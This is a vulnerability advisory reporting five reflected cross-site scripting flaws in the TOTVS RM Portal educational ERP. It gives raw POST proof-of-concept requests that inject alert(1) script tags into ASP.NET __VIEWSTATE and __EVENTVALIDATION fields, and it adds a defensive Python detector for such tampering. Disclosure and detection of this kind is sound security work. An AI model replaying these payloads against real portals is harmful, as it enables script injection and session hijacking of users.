TOTVS RM PORTAL Cross Site Scripting

Publish Date: 16 Feb 2016
Author: vesp3r

TOTVS RM PORTAL (Educational) - Multiple Cross Site Scripting Vulnerabilities
Product web page: www.totvs.com.br

Author: vesp3r
Email: vesp3r7c3@gmail.com
Published: 13/02/2016

[Vendor Product Description]

TOTVS (pronounced Totus) is a Brazilian software company, with headquarters in Sao Paulo. TOTVS was initially formed 
from the merger of Microsiga and Logocenter companies. It is the largest software company in Latin America.
TOTVS is the leader in the Brazilian ERP market according to the FGV, and besides Brazil it has offices in 
Argentina, Mexico and the United States.

[Advisory Timeline]

1- 22/Dec/2015                       (No vendor response)
2- 05/Feb/2016                       (No vendor response)

Tested on:

11.40.80.x
11.52.50.x
11.52.63.x
11.52.64.x
11.82.41.1
11.82.37.0 
11.82.41.112
11.82.42.1
12.1.6.108
12.1.6.117
12.1.7.100
12.1.7.110
12.1.7.120  
12.1.8.0
12.1.8.1


[Vulnerability Details]

An attacker could exploit reflected XSS through the unprotected __VIEWSTATE and __EVENTVALIDATION parameters, which are
passed to various scripts. A remote attacker can trick a logged-in administrator into opening a specially crafted link 
and execute arbitrary JavaScript code in the browser, in the context of the vulnerable website.


1) Reflected Cross-site Scripting - Login.aspx

Parameter: __VIEWSTATE

POST /corpore.net/Login.aspx HTTP/1.1
[Snip...]
Content-Length:599
Expect:100-continue
Connection:Keep-Alive

__VIEWSTATEGENERATOR=67BA4204&__EVENTARGUMENT=&txtPass=&__VIEWSTATE=%2fwEPDwULLTE4NzE2MDUyNDEPZBYCAgUPZBYCAgMPZBYKAgQPFgIeDUVudGVyRGlzYWJsZWQFBUZhbHNlZAIIDxYCHwAFBUZhbHNlZAIMDxBkDxYBZhYBEAUJQ29ycG9yZVJNBQlDb3Jwb3JlUk1nFgFmZAIQDw9kFgIeD0Rpc2FibGVPblN1Ym1pdAUFZmFsc2VkAhIPD2QWAh4Hb25jbGljawURRm9yZ290UGFzc3dvcmQoKTtkZOnQ03VTJ%2f9xMgjAXrV8uog9rRH%2flHTcm8QGAjB9nwz8a0d92<script>alert(1)<%2fscript>cd412&ddlAlias=CorporeRM&txtUser=&btnLogin=btnLogin%3dAcessar&__EVENTTARGET=&__EVENTVALIDATION=%2fwEdAAVhABOpj5tofEWFrJaBMLLmDFTzKcXJqLg%2bOeJ6QAEa2kPTPkdPWl%2b8YN2NtDCtxie46B0WtOk572tmQWZGjlgiop4oRunf14dz

2) Reflected Cross-site Scripting - EduPSCadastroCandidato.aspx 

Parameter: __VIEWSTATE

POST /Corpore.Net/Source/EduPS-ProcessoSeletivo/Public/EduPSCadastroCandidato.aspx HTTP/1.1
[Snip...]
Content-Length:294
Expect:100-continue
Connection:Keep-Alive

__LASTFOCUS=&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=26e09<script>alert(1)<%2fscript>6675c&__VIEWSTATEGENERATOR=2A268E6E&__EVENTVALIDATION=%2FwEdAGthFF%2FXOtK6iDwfhX1K6Jqoyk0VTIKR5mmZ%2BtIHMzMSvhs0Jc5vMLgh%2BScncp5A4h37bPOfETC9GIxfmAuz0Irc0oWQaruiZXPsPoJusmqmY3neRyPHmUYXvOoYPCF%2BNI6bJS0pQ

3) Reflected Cross-site Scripting - Calendar.aspx

Parameter: __VIEWSTATE

POST /Corpore.Net/SharedServices/LibPages/Calendar.aspx HTTP/1.1
[Snip..]
Content-Type:application/x-www-form-urlencoded
Content-Length:370
Expect:100-continue

__VIEWSTATEGENERATOR=CBEC090A&__EVENTARGUMENT=&__VIEWSTATE=%2fwEPDwUKMTY1OTMzMTQ5MmRk0Sm9YhG2VrmP7sr3Vdu25PXWEY00sTB9uOI0E2J%2bDto%3d8f844<script>alert(1)<%2fscript>f1c95&ddYear=1940&ddMonth=1&__LASTFOCUS=&__EVENTTARGET=&__EVENTVALIDATION=%2fwEdANEBWDAi1sF9XTMpt%2bPoIvbLLrtqFwodORsBP5MdtMp97Worg0EVYGtniwWRlldVBtgv0s7aRHloaIopjAs%2b7nenbhd3yRDnFv26m%2by5T5c3Rd7F9O8yK3w


4) Reflected Cross-site Scripting - TstMain.aspx

Parameter: __VIEWSTATE

POST /Corpore.Net/Source/Tst-Avaliacao/RM.Tst.Provas/Public/TstMain.aspx HTTP/1.1
Referer:http://intra.ubm.br/Corpore.Net/Source/Tst-Avaliacao/RM.Tst.Provas/Public/TstMain.aspx
[Snip..]
Content-Length:589
Expect:100-continue
Connection:Keep-Alive

__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=blFubtHIte6TnItfljNkVuCPdpxrn2d21QVLovI1Oj6c1BjTFGCeNA%2bNH1hljOzffBO%2bE1VjGIfJORklj03DwzHH9gnfklyMHTfrSc6jXT0lmgWQ%2fn09OLOLHFy22L%2f09cQ2cnhIJ8zjXTNBkJOTrizTSX8roB4A2%2f5F0nw%2bHMedUzRwjzgcvas%2bVdOqpdrMgp%2bqwioI9MguZtfxVD7ONhnPDwo%2bUgLB2QraeHh4Fd7DAFy2BsVsCl7an3DaKlx0pMIwi%2f2g%2f8y%2f5VXL1WbXYw%3d%3d63eb9<script>alert(1)<%2fscript>35554&__VIEWSTATEGENERATOR=D041C7D7&__VIEWSTATEENCRYPTED=&__EVENTVALIDATION=oIbBDabE%2FPH2SjDjDsk1A4dri3DAV4qax04lAj1I%2B3JimDK%2Bq%2Bl4qrek8MK8H861dVvJHSx56%2BNa5v49Ol5ulZsG3D1QPnf2XgNT1yp2LaTarGQOsUfw60t

5) Reflected Cross-site Scripting - RecoverPassConfirmation.aspx

Parameter: __EVENTVALIDATION

POST /Corpore.Net/SharedServices/LibPages/RecoverPassConfirmation.aspx?UserCaption=5LK%5c9F%5c3D%5c023%5c5B&ConfirmationCaption=%5c7B%5cFAbP%5c06%5c11Q%5c7C&RecoverContainerClassName=ASP.login_aspx%2c+App_Web_jfz24ryx%2c+Version%3d0.0.0.0%2c+Culture%3dneutral%2c+PublicKeyToken%3dnull&RecoverInitializeMethodName=GetRecoverPassServer&ServiceAlias=CorporeRM HTTP/1.1
[Snip..]
Content-Type: application/x-www-form-urlencoded
Content-Length: 458

__EVENTTARGET=btConcluir&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=%2FwEPDwULLTE2NDcyMzE4MDYPZBYCAgMPZBYEAgQPDxYCHgRUZXh0BQhVc3XDoXJpb2RkAgoPDxYCHwAFBUVtYWlsZGRkb5MeS264FOK9nmP0a1CNQffkay3Ey3ZEBuou6pi65D8%3D&__VIEWSTATEGENERATOR=AF2B313E&__EVENTVALIDATION=%2fwEdAAQGOgL7oK09LZ8PS37yV0yhEtmPWx9iivvmRAEsPWDH1L%2bBuAd%2fYR2jHO%2bKtDPe6m0Cy01bBAlsk2p17oJudhiaquajs%2bXic334N3XfjA0JtMaIEGbBaz%2fyyDVIoKpthJc%3dd8504<script>alert(1)<%2fscript>a2460&TextBoxUser=a%40a.com&TextBoxConfirmation=a%40a.com
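All five requests above share one shape: a script tag is spliced into an ASP.NET state field (__VIEWSTATE or __EVENTVALIDATION), whose legitimate value is always plain base64. The following detector, added here as an illustration and not part of the advisory or of TOTVS' code, parses a URL-encoded POST body and flags state fields that carry markup or are not valid base64; the sample bodies are constructed to mirror the PoC layout and are not the real ViewState values.

```python
import base64
import binascii
import re
from urllib.parse import parse_qs

# Only these two ASP.NET hidden fields are base64; __VIEWSTATEGENERATOR is a hex id.
STATE_FIELDS = ("__VIEWSTATE", "__EVENTVALIDATION")
B64_RE = re.compile(r"^[A-Za-z0-9+/]*={0,2}$")
TAG_RE = re.compile(r"<[A-Za-z/!]")  # start of an HTML tag after URL decoding


def is_strict_base64(value: str) -> bool:
    """True if value is canonical base64: valid alphabet, padding and length."""
    if not B64_RE.match(value) or len(value) % 4:
        return False
    try:
        base64.b64decode(value, validate=True)
        return True
    except (binascii.Error, ValueError):
        return False


def find_tampered_state_fields(body: str) -> list[tuple[str, str]]:
    """Return (field, reason) for every state field that looks tampered.

    This checks encoding only; it cannot verify the ViewState MAC, which
    requires the server's machineKey. It is a log/WAF-side heuristic for the
    injection pattern shown in the advisory, not a replacement for output
    encoding on the server.
    """
    findings = []
    fields = parse_qs(body, keep_blank_values=True)  # also URL-decodes values
    for name in STATE_FIELDS:
        for value in fields.get(name, []):
            if TAG_RE.search(value):
                findings.append((name, "markup in value"))
            elif not is_strict_base64(value):
                findings.append((name, "not valid base64"))
    return findings


# Constructed sample bodies (hypothetical values in the shape of the PoC requests).
LEGIT_BODY = ("__EVENTTARGET=&__VIEWSTATE=%2fwEPDwUKMTY1OTMzMTQ5MmRk&__VIEWSTATEGENERATOR=CBEC090A"
              "&__EVENTVALIDATION=%2fwEdAAQGOgL7oK09LZ8%3d&btnLogin=Acessar")
TAMPERED_BODY = ("__EVENTTARGET=&__VIEWSTATE=%2fwEPDwUKMTY1OTMzMTQ5MmRk8f844<script>alert(1)<%2fscript>f1c95"
                 "&__VIEWSTATEGENERATOR=CBEC090A&__EVENTVALIDATION=%2fwEdAAQGOgL7oK09LZ8%3d")
CORRUPT_BODY = "__VIEWSTATE=%2fwEPDwUKMTY1OTMzMTQ5MmRk8f844&__EVENTVALIDATION=%2fwEdAAQGOgL7oK09LZ8%3d"

if __name__ == "__main__":
    for label, body in (("legit", LEGIT_BODY), ("tampered", TAMPERED_BODY), ("corrupt", CORRUPT_BODY)):
        print(label, find_tampered_state_fields(body))
```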

Thanks to: Ewerson Guimarães (Crash) and Rodrigo Favarini